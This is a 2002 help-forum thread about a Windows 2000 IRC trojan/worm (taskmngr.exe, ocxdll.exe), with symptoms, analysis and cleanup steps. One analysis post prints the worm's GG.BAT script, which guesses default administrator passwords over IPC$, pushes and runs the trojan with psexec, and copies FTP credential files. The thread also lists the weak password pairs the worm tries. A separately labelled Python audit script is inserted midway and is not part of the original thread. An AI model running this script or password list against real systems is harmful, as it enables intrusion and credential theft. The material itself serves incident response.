Newbie dot Org HomePage
taskmngr.exe
guest

08/26/02
In my winnt/system32 there is a taskmngr.exe. Is there such a file in Windows 2000? It's really screwed up because taskmngr.exe is in my startup and it's a mIRC app with a mIRC icon. I know there should be a taskmgr.exe file, but if you have Windows 2000 and you have a taskmngr.exe, please give it to me.
Jeff Yette

08/27/02
I think this is a new virus (worm) that really screws with your security settings ... Norton has no information on it. But if you check the creation date of the file ... it's probably very new. My computer is infected with it and I'm trying to find more info myself.
Orion

08/27/02
I'm running NAV with the most current defs. I got a warning that the ircmimic virus was found in the file win32.dll (NOT a part of Windows 2000. More info on ircmimic: http://securityresponse.symantec.com/avcenter/venc/data/irc.mimic.html). NAV quarantined this file. I deleted it, and a subsequent virus scan found no more viruses. I rebooted and got the mirc app you mentioned. In the registry I found this taskmngr.exe file now set to run every time I booted. Needless to say I deleted taskmngr.exe and the registry entry.
Ryan Wahlquist

08/28/02
Orion, what was the reg entry you found? I have found nothing on Symantec.com on this virus. Could ya share with me please? Am at a loss for what the heck this is. However, I think you guys should check for the following 2 files on your HD, also found in system32: NT32.INI and dll32nt.hlp. Can't find anything on them as to whether they are also a part of the virus. But we have 2000 at work and they are on none of those machines.
Nathan Ellis

08/28/02
Found the same file (taskmngr.exe) on a user system I'm trying to repair. The only things recently installed were Quicktime 6.0 and Webshots Daily Photo. The file opens what appears to be a Mirc registration window. Symantec states that while the file does not appear to contain malicious code, the program could be used for destructive purposes. You need to open regedit.exe (registry editor), go to Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run and locate an entry for run32dll that accesses c:\winnt\system32\taskmngr.exe. Delete the entry and the file and you should be okay.
Nathan Ellis

08/28/02
Ryan,

Good job! This is an IRC Trojan that uses Mirc as its engine. dll32nt.hlp is the actual virus. Delete the files and update your virus definition files.

Dear Nathan Ellis,

We have analyzed your submission. The following is a report of our findings for each file you have submitted:

filename: E:\Documents and Settings\nellis\Desktop\nt32.ini
machine:
result: See the developer notes

filename: E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP
machine:
result: This file is infected with IRC Trojan

filename: E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE
machine:
result: See the developer notes

Developer notes:
E:\Documents and Settings\nellis\Desktop\nt32.ini does not appear to contain malicious code. E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP is a non-repairable threat. It is detected by NAV after an update using the attached definition updater. Please delete this file and replace it if necessary. E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE contains no malicious code although it can be used for malicious purposes. It is safe to delete this file.

The attached file is a self extracting zip containing updated virus definitions for Norton AntiVirus to successfully detect and repair
this virus.

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

--
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

--

Ryan Wahlquist

08/28/02
Cool. Thanks Nathan. I too am an admin for a company and this has been driving me nuts for 24 hrs. Thanks for the confirmation.

Ryan

Carol

08/29/02
FYI - I have also been infected by the IRC Trojan virus.

Although, the symptoms I experienced were the following...some windows when opened would throw this error "HideWindow - Error, Window Not Found!". The windows receiving the error were when I opened Internet Explorer, Search - Help, Windows Explorer, Add/Remove Programs, and My Documents or when any website opened a new window.

In addition, I saw on a Microsoft developers newsgroup that others are affected and were receiving the same error as myself "HideWindows-Error" - none of the people, of course, realized this was the result of a virus.

Three other symptoms that I experienced: 1) a very, very tiny "MIRC" icon displayed on bootup and quickly disappeared, 2) a command window appeared during bootup in my active apps very briefly, 'secedit.exe' - and I found the sec*.bat file which was starting the command, 3) every time I shut down my machine, taskmngr.exe would pop up for 'end task' - of course, I thought this was really Task Manager until scanning the hard drive and finding the MIRC taskmngr.exe.

Question - any idea yet as to how this virus spreads? and exactly what damages it causes?

thx

David

08/30/02
On one of my clients machines it enabled the guest account and added it to the admin group.
Erez

08/30/02
We had the same virus and it messes up your security settings, specifically your local security group permissions on your network. You will need to re-add the Domain Users or Authenticated Users to the local Users group of that machine. Also the virus uses your machine as a bot to further spread the virus, utilizing your bandwidth. Called Microsoft and they assured me it is the Trojan IRC virus. They claim that it is spread via various chat programs.
They are still trying to figure this one out.
I will let you know as soon as I have more information.
guest

08/30/02
After reading this I'm very worried. What should I do with my taskmngr.exe? My virus scan says it's not a virus. I already took it off of my startup; how can I clean it? And I want to know how I got it. I don't use any IRC programs, so why do I have it? If you want the file to dissect it to search for a virus, feel free to ask me for the file and any other file you wish to dissect that is linked to taskmngr.exe, and please give me info on how to clean the virus.
guest

08/30/02
You're right, this virus uses your computer to go on an IRC server and attack and flood channels. Basically it uses YOU to connect to a server and makes your computer type messages to the channel. Go to c:/winnt/system32/NT32.ini and find the IRC server; the one on my computer was alive.stupidsic.com:6667. Basically it's like a Sub7 flood, yes Sub7 the trojan.
These are the files:
[afiles]
n0=nt32.ini
[rfiles]
n0=nt32.ini
n1=nt16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=httpsearch.ini
Read the nt16 file; it tells you the server and the channel you have joined. Maybe you can find some info on the attacker.
guest

08/30/02
I think your PC should be clean after you delete those files in your winnt/system32 folder and also delete the startup key in your regedit.
DJ

08/30/02
Found this one on a win2000 server. I've installed mozilla and quicktime recently.
Aside from removing taskmngr.exe from startup, other programs I have moved to a separate dir to be safe for now, since these were all new file creations in /system32/, are ocxdll.exe, omt.exe, mt.exe, MDM.scr, GG.bat (this bat looks for sites.dat and ws_ftp.ini on your local machine, makes a copy and then passes itself off to taskmngr, which is connecting to IRC channels, possibly uploading different files from your system).
I've been using "netstat -an" to watch outgoing IP traffic and have only been seeing port 6667 used.
Ken Bour
ken.bour@verizon.net
09/01/02
I got hit with this Trojan also. Incidentally, I also had recently installed QuickTime. I wonder if there is a connection? Anyway, Norton was running and was up-to-date, but it only detected the IRC Trojan during a routine scan. It quarantined a number of files (e.g. v.exe, mt.exe, et al.); however, as others have mentioned, there is more to do: (1) remove taskmngr.exe (also in registry); (2) search WINNT\system32 for any files CREATED on 8/19/02 (I'm not 100% sure of this, but there were a bunch of them including: ocxdll.exe, mdm.scr, gates.txt, kill.exe, mdm.exe, mdm.scr, gg.bat, ncp.exe, ocxdll.exe, psexec.exe, secedit.sdb, gates.txt, dll16.ini). I put them in a separate folder just in case one or more are needed; (3) find all occurrences of MIRC in the Registry and delete them (one couldn't be deleted -- I may have to reboot to get that last one out).
aladin
aladin168@hotmail.com
09/04/02
More Analysis on ocxdll.exe virus:

++
This is a trojan using an SMB over TCP attack, using port 445. It looked for weak administrator IDs and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with the ocxdll.exe virus. This occurred back on 8/28/2002 at 3am. After some detailed analysis, I determined that it was a Trojan, deleted the detected registry entries, deleted the infected files, tightened the administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) (if they have a backup .sdb file, then just reapplying the security policy would fix this part), and added users back to local. The cause is bad security (admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Affected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows 2000
- Windows NT - might be infected, but will not distribute or change security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more random characters
4. It ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using the Microsoft security editor (SecEdit.exe /configure) command: reset the security policy to default settings, and apply the security settings in TFTP8675. This is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the real program that started the hacking.
7. It tries to hack into the system using the following user ID and password. If you don't have these user id and passwords, maybe you are just infected with 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator IDs and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If the file was already there, it copied it anyway, and did it quietly (using psexec.exe -c -f -d).
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory. (maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or attempt successful.
++
Disclaimer: The IRC bot scripts have not been fully analyzed. This is what I understood so far. The removal instructions WILL remove the trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe involved, which is the NetCat program. This program allows the hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data were lost.
2. Worst-case scenario is that they have controlled your system and implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)
3. Change the LOCAL Administrator password on ALL systems! Make sure they are strong passwords! Use a mix of uppercase, lowercase, numbers, and non-alphanumeric characters, i.e. _, +, =, ), ...
4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit /configure C:\WINNT\security\Database\secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security Policy, click on "User Rights Assignments", and add users and groups back into the policy. "Access this computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your firewall and block any and all unwanted traffic from accessing ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS. This will allow you to monitor anyone trying to use the "Administrator" login.
3. Set up the security log, at minimum to log successful and failed Logon/Logoff, and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp, which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet". This meant "configure your system setting with the default security policy, plus the additional settings in tftp8675". It basically removed many security restrictions, remove all audits for the systems, and of course remove all users in the "Local Users allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracting file that included 17 files. It is a Trojan and it's a worm. In dll32nt.hlp, it has an instruction to do an IP scan, and store the 20 IP addresses it found. Most likely it scanned the subnet and file server that were connected to the victim systems at that time. Then it has an instruction at the end to run GG.BAT, which is the instruction to attack the 20 IPs it just found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
--
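The secedit template analysis above invites an automated check. As an added example (not code from the thread or from Microsoft), the Python script below parses a secedit-style .inf template such as the TFTP8675 listing and reports each setting that is weaker than a baseline; the "[System Access]" header and the baseline values are this example's own assumptions, not Microsoft defaults.

```python
"""Audit a secedit .inf security template for weakened settings.

Added example, not code from the thread or from Microsoft. It parses the
INI-style text that "secedit /configure /cfg <file>" consumes (the TFTP8675
listing has this shape) and reports each setting weaker than a baseline that
is this example's own assumption, not a Microsoft default.
"""
import configparser
from typing import Callable, Dict, List, Tuple

# Constructed sample input: the values the thread quotes from TFTP8675, with
# the "[System Access]" header that the quoted fragment omitted.
TFTP8675_SAMPLE = """\
[System Access]
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
"""


def at_least(n: int) -> Callable[[int], bool]:
    return lambda v: v >= n


def failure_audited(v: int) -> bool:
    # Audit values in secedit templates are bit flags: 1 = log success,
    # 2 = log failure, 3 = both; 0 switches the category off entirely.
    return (v & 2) == 2


# Assumed baseline: key -> (check, expected value, why it matters). Keys absent
# from a template are not flagged, because /configure leaves them unchanged.
BASELINE: Dict[str, Dict[str, Tuple[Callable[[int], bool], str, str]]] = {
    "System Access": {
        "MinimumPasswordLength": (at_least(8), ">= 8", "short passwords are guessable"),
        "PasswordComplexity": (at_least(1), "1", "off permits 'admin'/'administrator'"),
        "PasswordHistorySize": (at_least(5), ">= 5", "lets an old password be reused"),
        "LockoutBadCount": (at_least(1), ">= 1", "0 lets guessing run unthrottled"),
        "MaximumPasswordAge": (lambda v: 1 <= v <= 90, "1..90", "0/-1 means never expires"),
    },
    "Event Audit": {
        "AuditLogonEvents": (failure_audited, "2 or 3", "failed logons reveal guessing"),
        "AuditAccountLogon": (failure_audited, "2 or 3", "network logon failures unseen"),
        "AuditPolicyChange": (failure_audited, "2 or 3", "a policy reset leaves no event"),
        "AuditAccountManage": (failure_audited, "2 or 3", "guest enabled/added to admins"),
    },
}


def parse_template(text: str) -> Dict[str, Dict[str, str]]:
    """Parse template text into {section: {key: value}} with key case kept."""
    # The fragment quoted in the thread starts straight at the password keys
    # with no header; those keys live in [System Access], so a headerless
    # fragment is read under that section (an assumption of this example).
    if not text.lstrip().startswith("["):
        text = "[System Access]\n" + text
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # do not lowercase keys
    parser.read_string(text)
    return {s: dict(parser[s]) for s in parser.sections()}


def audit_template(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (section, key, value as written, detail) for each weakening."""
    cfg = parse_template(text)
    findings: List[Tuple[str, str, str, str]] = []
    for section, checks in BASELINE.items():
        for key, (check, expected, reason) in checks.items():
            raw = cfg.get(section, {}).get(key)
            if raw is None:
                continue
            try:
                value = int(raw)
            except ValueError:
                findings.append((section, key, raw, f"non-numeric; expected {expected}"))
                continue
            if not check(value):
                findings.append((section, key, raw, f"expected {expected}: {reason}"))
    return findings


if __name__ == "__main__":
    for section, key, value, detail in audit_template(TFTP8675_SAMPLE):
        print(f"[{section}] {key} = {value}  <- {detail}")
```

Run against the TFTP8675 values it flags the four password settings and the four audit categories; MaximumPasswordAge = 42 passes, which shows the script reports only what the baseline actually disallows.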

aladin
aladin168@hotmail.com
09/05/02
Correction on steps to restore to the default Microsoft security template. The following steps are from Edward Alfert (edward@alfert.com) on Usenet, topic "Solution to mIRC and Secedit Virus Networking Problems." in microsoft.public.scripting.virus.discussion. These steps will bring you back to the original Microsoft default template, but you MUST go through them and make sure proper access was not modified. You or some of your applications might have had specific rights settings prior to the compromise, and the user/group privileges/rights need to be reset if necessary.

You probably have seen a strange user with weird SID that was added by the trojan in the "Logon Locally" policy. Remove the user. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file.

Here are the steps to restore the original default Microsoft template from Edward Alfert
==
NOW THE FUN PART..

1) use the backup security database template to restore the system to its
original microsoft defaults. (NOTE...if you upgrade from a previous OS,
this default may not be the default you are used to)...

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose

2) copy /winnt/security/database/secedit.sdb to
/winnt/security/database/secedit-check.sdb

you need to do this because you can't run step #3 against the original
secedit.sdb

3) click on start, run, type mmc and click ok

4) click Console menu, then Add/Remove Snap-In

5) click Add, then double click on "Security and Configuration Analysis" and
"Security Templates", then click close, and ok.

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

7) right click on "security and configuration analysis" and select
"analyze computer now"

8) browse through the directory structure and you will see that the
computer is currently configured differently..

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by
the trojan) is that nobody is allowed to logon to the computer via the
network).

go to "security and configuration analysis"... then "local policy"... then
"user rights assignment"...

The first line... "Access this computer from the network" doesn't list any
user or group!... this is definitely NOT the default... the default is to
include the following "Backup Operators, Power users, users,
administrators, everyone"..

Add these, and everything should now be fixed with "workgroup" networking.

If you have any questions, or need further help, reply to this thread
instead of the others... I will be monitoring this thread...
==

Damien
onepercent@eudoramail.com
09/05/02
I read in Wired today that taskmngr.exe IS a backdoor. MS issued a vague warning about it. It is running on my machine also. I am going to do a little more investigating before I alter anything.
Eschient

09/06/02
Possible source?
Just a little information that I'm wondering about. I ran a scan of all the files I have had "added" to my computer since the earliest date on the files listed {8/10}. I have found the following programs were the only ones installed :

NVIDIA - New video card installed
Putty - New shell application
Maxis - Sims and Sims Vacation
Adobe - Acrobat Reader
Norton - New Virus Definitions
Microsoft Games - Zone files for Asheron's Call
Microsoft Games - .exe for Asheron's Call 2 Beta
1.0 - A folder containing a hell of a lot of files for Microsoft's "Cubis".

The only thing that raises my eyebrow is the 1.0 file. It contains over 200 various small files and 2 zips, including "cubis.jar-4c1275de-16bce078" and "GroopzApplet.jar-66d0be0a-30a89ef9". After unzipping GroopzApplet.jar-66d0be0a-30a89ef9, I found a 3rd zip, "GroopzApplet.jar-77e7758b-2746df5d".

So, I did a little search and found that this Groopz thing is toted as :

you can take your web site visitors on guided tours by "pushing" web pages to your visitor’s browser with the Groopz Operator program. You can simultaneously chat and push pages, making the live tours truly interactive, personal, and effective.

You can also push any web-accessible file, including sounds/MP3s, pictures, MS Word documents, PDF documents, and ZIP files.

Which means it would be perfect for, oh, I don't know, pushing huge files, mp3s, images and the like into say, an IRC channel.

Kyle Lai
aladin168@hotmail.com
09/07/02
I highly recommend everyone to run an Anti-Trojan in addition to the virus scan program. Antivirus programs don't pick up some of the trojans, plus some tools that could be used by hackers. There are several products out there, i.e. Anti-trojan, Pest Patrol. The one I use is anti-trojan. You can get it from http://www.anti-trojan.net.
Run this and you can be sure if there's any unwanted stuff on your system.

In addition, there might be some adware that was installed on your system when you surf the web. You want to make sure you get rid of these adwares because it might open ports on your system and send info on your system back to the vendors. You can detect these adware by using another tool called ad-aware. You can download the tool from http://www.lavasoftusa.com/

Hope this helps.

Kyle Lai, CISSP, CISA, MCSE
aladin168@hotmail.com

steve
cheequan@yahoo.com
09/10/02
Aladin, on your post dated 09/05/02 on how to restore the default Microsoft security template, for step 1: ...

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose

... I get this message after the process is done:

"Task is completed. Some files in the configuration are not found on this system so security cannot be set/queried. It's ok to ignore. See log C:\WINNT\SECURITY\TEMPLA~`\basicwk.log for detail info."

(btw, basicwk.log is 628KB, so I'm not sure what to look for in there... ^^;;)

And then, when I get to step 6:

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

I can't find secedit-check.sdb. (I do find secedit.sdb though). Even if I do a search on all my drives I still can't find secedit-check.sdb. I'm guessing the error message from step 1 has something to do with it. Well, any suggestions? ^_^

Thanks~
steve

Kyle Lai
aladin168@hotmail.com
09/12/02
Steve,
It's actually in Step 2 of the instructions. Make sure you copied the file and named it "secedit-check.sdb".

I did post the updated part 1 of the analysis, and a follow-up:
Part 1:
http://groups.google.com/groups?q=solution+irc+virus&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com&rnum=4

Part 2:
http://groups.google.com/groups?dq=&start=25&hl=en&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

I'd like to stress that the permission/rights settings are more critical if your servers were infected. Make sure you RESET proper rights to the users and groups so systems, backups, and other applications will run properly. If not possible, or if your system is working weirdly, I suggest re-building the server because you don't want to take any chances, especially if it's a critical system.

Here is the latest update:
1. I did not see any Anti-virus software vendor posting any alert, or give a name to this virus/trojan/malware, but they did identify some, but not all of these files in their later virus definition files.

2. Microsoft posted their analysis on the Microsoft Knowledge Base Article - Q328691, but info is not all correct. This is in the part 2 of my analysis.

3. One Microsoft PSS Security Specialist contacted me via email after reading the part 2 of my analysis, and I gave them a copy of the trojan/virus I analyzed. I have not heard back from him for the last couple days. Due to the scope of the infection, I hope they release some type of recommendation and/or alert to everyone that were infected because this trojan involved many 3rd party tools, hacker programs, and possibly a distributed Denial of Service program.

If possible, please send me an email at aladin168@hotmail.com; I'd like to do a quick survey to kind of identify the scope of this outbreak. All responses will remain anonymous. I promise. If you are not comfortable, please reply anonymously in this discussion group.

Thanks so much for your input.

Survey:
++
What's your infected Operating System?
What Service Packs were installed (if any)?
What's the time of the infection (approximate)?
What actions have you taken?
Did you reset the password for your administrator accounts?
Did you ever see ocxdll.exe as an infected file?
Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
Did you ever see mt.exe? A possible dDos client.
What Anti-virus software do you use, and did it identify irc/flood trojans?
Did you see the virus coming back and get alarmed by your Anti-virus program?
++

Again, this trojan did spread by itself. The only protection is to re-set the administrator password to something hard to guess. If there is still a trojan out there that has not yet been removed, it will still actively find vulnerable systems to hack itself into.

I won't be surprised if there is a variant of this trojan in the future, so make sure you do some type of security assessment.

Additional Recommendation:
Shields-Up (https://grc.com/x/ne.dll?bh0bkyd2) is the most basic test you can do to test your network connection to the Internet. Go to that website and click on "Probe my ports" and it will give you some valuable results. If the Shields-Up test results show any open ports on your system, then you had better install a FREE firewall like ZoneAlarm (www.zonealarm.com), then go to the Shields-Up site and test it again. Unless you block the traffic from coming in, you are still vulnerable.

/Kyle
Kyle Lai Consulting
www.kylelai.com
aladin168@hotmail.com

Pam

09/20/02
I want to thank all of you for the information you have presented on the "rude" attack from the hackers... I was attacked also by the mirc "stuff"... I didn't know there were programs out there which "sniff" out the little worms which lurk inside your computer. You all provided links and information to fight back. The hide window error was the most irritating I have ever seen. I downloaded the worm software where the little trojan horse spins around and it located 3 of the worms. I was not happy with that program because it kept bringing up my Windows Installer program. The last scan I ran using that software indicated I did not have any trace of worms. I knew there had to be another one out there. I kept searching and found a freeware program called Swat It. This program found the other worm, hide window error, and removed it. So far, everything now is working with no errors. I am operating Win2000 and have a cable modem. I was attacked sometime around the middle of August. Thank you all again for helping me learn more about worms and such.
Eivind

09/22/02
I've spent the last 24 hrs trying to get rid of this worm.

The most disturbing thing is that I found a file called psXXX.XXX.XXX.XXX.txt (X - is my IP no) with approx the same time and date, and in the same directory, as the other modified files.

This file contained my mail address and password, the URL and user name for my internet bank account and various other login info.

Does anyone else have this file? If it's linked to the worm, then whoever planted it, may also have this information.

Someone mentioned QuickTime, I've also just recently installed QuickTime.

Frank

09/22/02
I strongly recommend that after a worm or virus infection you take the precautions of changing all of your login information.

That means talking with your ISP and changing your connection password.

That means changing the password for your online banking, your password for Paypal, and any other online services you care about.

The information you mentioned should never under normal circumstances be placed in a single file. That was collected by some program. It may or may not have been uploaded to the web by the worm.

You should be cautious and change those passwords.

Kyle Lai
kyle@kylelai.com
09/24/02
I agree.

Besides changing all of the passwords on all of your accounts, make sure you change the Windows Administrator account to something that's hard to guess.

Besides that, here are 4 FREE software that will help you fight the Trojan and intrusions. Make sure you get the latest update regularly:

1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com

2. Make sure you get Anti-Trojan software on top of the Anti-Virus software. Much Anti-Virus software does not detect Trojans and hacker software that was installed during an intrusion. Anti-Virus software does not detect hacker software because it could be used legitimately by security professionals... A free and great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

3. Get the Ad-Aware software, which is for removing the advertising software that web advertisers install on your systems without your acknowledgement just by surfing the Web... This is free software too: http://www.ad-aware.com

4. Get a firewall for your computers if you have not got one. Here is a very simple to use FREE firewall software: http://www.zonealarm.com

Good luck!

Kyle Lai Consulting
www.kylelai.com
kyle@kylelai.com

Ingrid
gritje10@hotmail.com
10/01/02
If your PC gives the error "Hidewindow-error" when closing down the system, does it mean that you have a virus? We scanned the whole PC with Norton AntiVirus 2002 and an online virus scanner and found nothing. But the error still remains.
At the same time, when we start Internet Explorer we get the message: kernel32dll close down.
Please help us.
tadayon
mehditadayon_iut@yahoo.com
10/02/02
mdm.exe
This virus has hung my PC and I can't do anything unless I reset using the case button.
Please guide me on cleaning this virus,
thank you,
mehdi tadayon.
Tina

10/07/02
My Irc Trojan came in on September 20, 02 and the only thing that I did was run Windows update hmm.
Paul

10/07/02
I had also recently installed QuickTime. I had many of the files that you specified, but not all. My gg.bat file was called backup.bat. There was another file called pstor.exe which was from around the same time. I know I hadn't installed anything, so I got rid of it as well.
phil

10/08/02
Tftp8675! Does the 8675 represent a port? Does this virus try to set up your computer as an Tftp server? What is wrong with these people?
Theresa
tree101457@adelphia.net
10/09/02
I had gotten the Trojan.Irc Bounce virus by downloading a song on winmix, I believe. I had scanned after deleting the song and found no more virus, then today after getting the computer back from the shop found the virus was now in my C\WINNT\system32\nt32.ini file. I am running Windows 2000 Pro. My question is, I deleted the file since it was non-repairable. I also followed the keys in regedit but found no taskmnger files. Does this mean I got rid of the virus and all the problems related to it? And also, will my machine run OK without this file? This operating system is totally new to me so I'm not real sure what to do now.
Thanks
Brian
brian.stensrud@telusmobility.com
10/10/02
I didn't have all the files mentioned in previous posts (did have some of them).
Please also look for :
=adobes.exe
=abc.dll
=abc2.dll
=abcd.jpg
=moo.dll
=remote.ini
=abc.bat
These all had references to:
=looking for / using accounts/passwords
=MIRC
=bizarre (foul even) language in the .INI file (also a reference to a site that I also saw when "mIRC" launched itself on boot).

All found (on my machine) at C:\WINNT\system32\shell. Found by luck when searching for some of the files listed by others.

Brian

10/10/02
... ooops - forgot to mention "adobea.exe" as well as "adobes.exe" - these 2 are actually listed as mirc (check properties).
Brian
brian.stensrud@telusmobility.com
10/11/02
I finally got rid of it for good (I think). The file "adobea.exe" would reappear every time I deleted it. It would then recreate abc2.dll. I downloaded the free firewall mentioned in a previous post (http://www.zonealarm.com) and after updating my registry, etc. etc., and setting the firewall on, I then tried to delete "adobea.exe". Immediately on its being deleted, the firewall informed me that it had blocked an incoming call from 64.90.175.100. This time "adobea.exe" did not get recreated -- coincidence ?? -- not likely from where I sit.
Anyways -- there's the IP of where I think the trouble might be .. I'm happy just to be done with it .. someone else may feel like following up ..
John
john@john-rayner.com
10/21/02
I just got this ugly virus/trojan over the weekend, and thanks to this forum I am pretty sure I got it all cleaned out. I am still unsure how it got on my system as I had not downloaded anything. The only explanation I can come up with is some junk mail that I opened up within Outlook Express, that may have triggered a download of some sort. I am still baffled as I had not opened any files and didn't see a download. What also worries me the most is that at no time did NAV find anything wrong or find the virus itself in the .hlp file. Anti-Trojan definitely did the business, as it found an open port that the trojan was running through and shut it down.

What I am not 100% sure about though is if I had fixed the secedit file correctly. I followed the instructions posted above, but I didn't see anything different from what was standing. All my auditing stuff was still set as disabled and something I had changed in the original secedit file was still standing, which should have been overwritten when I had imported the files using the snap-in in the mmc program.

Any additional help on the secedit functionality and manual edits that I can do would be appreciated. I am really not a pro in this security function, so not sure what I need to actually set.

Thanx again for this excellent thread.

John.

Nasrid
nasrid@mindspring.com
10/26/02
